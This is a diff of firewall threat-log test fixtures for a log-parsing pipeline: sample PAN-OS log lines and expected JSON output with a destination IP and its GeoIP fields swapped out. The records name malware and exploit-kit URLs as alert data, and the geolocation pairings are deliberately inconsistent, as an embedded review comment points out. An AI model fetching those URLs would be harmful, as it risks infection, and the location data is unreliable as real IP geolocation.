+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 
08:22:27,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
07:18:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
08:16:57,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:48:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:54:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 
03:55:23,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json
index 4fc03f52005..0f69e78be65 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json
@@ -7,26 +7,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "204.232.231.46"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -42,7 +41,7 @@
 },
 "ip": "192.168.0.2"
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -84,7 +83,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=",
+ "community_id": "1:CpnxxiYk2GolQXL1AiyOIq2jeIE=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "inbound"
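Review bot: The new destination.geo block is internally contradictory: the GeoIP-derived fields now read `"country_name": "China"` / `"region_name": "Jilin"` while `"name": "United States"` on the line between them is unchanged, and the same pairing recurs in the destination.geo hunks at @@ -151, @@ -295, @@ -439, @@ -583, @@ -727, @@ -871 and @@ -1015. Judging by the `+Mar 25` sample lines above, `geo.name` presumably comes from the log's own location column, which this commit left as it was (175.16.199.1 now appears next to "United States", "Netherlands", "Ukraine" and "China" in different records), so the expected output looks like a parser defect to anyone reading it. If the fixture is meant to exercise the GeoIP path, the sample log's srcloc/dstloc columns should be brought in line with the new address; otherwise a short comment in the test config noting that the location columns are intentionally arbitrary would prevent this being reported as a bug.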
@@ -121,14 +120,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545296385Z",
- "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "ingested": "2021-12-09T13:42:59.078988500Z",
+ "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "created": "2012-10-30T09:46:12.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -151,26 +150,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "204.232.231.46"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -186,7 +184,7 @@
 },
 "ip": "192.168.0.2"
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -228,7 +226,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:0fIOSC1t62T9ExNKvZaxl657EVc=",
+ "community_id": "1:lB9VWdNEHqna/swiak+4X1dqv1k=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "inbound"
@@ -265,14 +263,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545314754Z",
- "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "ingested": "2021-12-09T13:42:59.078997900Z",
+ "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "created": "2012-10-30T09:46:12.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -295,26 +293,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "204.232.231.46"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -330,7 +327,7 @@
 },
 "ip": "192.168.0.2"
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -372,7 +369,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:bZl1JgwyPgfsbSrD+z8I/hpbdc4=",
+ "community_id": "1:3be4rO6jMOmXDKYhNViDYESR4pg=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "inbound"
@@ -409,14 +406,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545322646Z",
- "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "ingested": "2021-12-09T13:42:59.079001800Z",
+ "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "created": "2012-10-30T09:46:12.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -439,26 +436,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "204.232.231.46"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -474,7 +470,7 @@
 },
 "ip": "192.168.0.2"
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -516,7 +512,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:ghLw4NDj0JmAhH9lVtlhdQpqEQ0=",
+ "community_id": "1:CvgumdBliLFimUvrE/1C91M3lrQ=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "inbound"
@@ -553,14 +549,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545329990Z",
- "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "ingested": "2021-12-09T13:42:59.079006500Z",
+ "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "created": "2012-10-30T09:46:12.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -583,26 +579,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "204.232.231.46"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -618,7 +613,7 @@
 },
 "ip": "192.168.0.2"
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -660,7 +655,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:aiB5YppFUGX0pM/1Xtp3qOSFXJw=",
+ "community_id": "1:6fDJsdstw4iPHg4mtYfqCIw/9W8=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "inbound"
@@ -697,14 +692,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545337309Z",
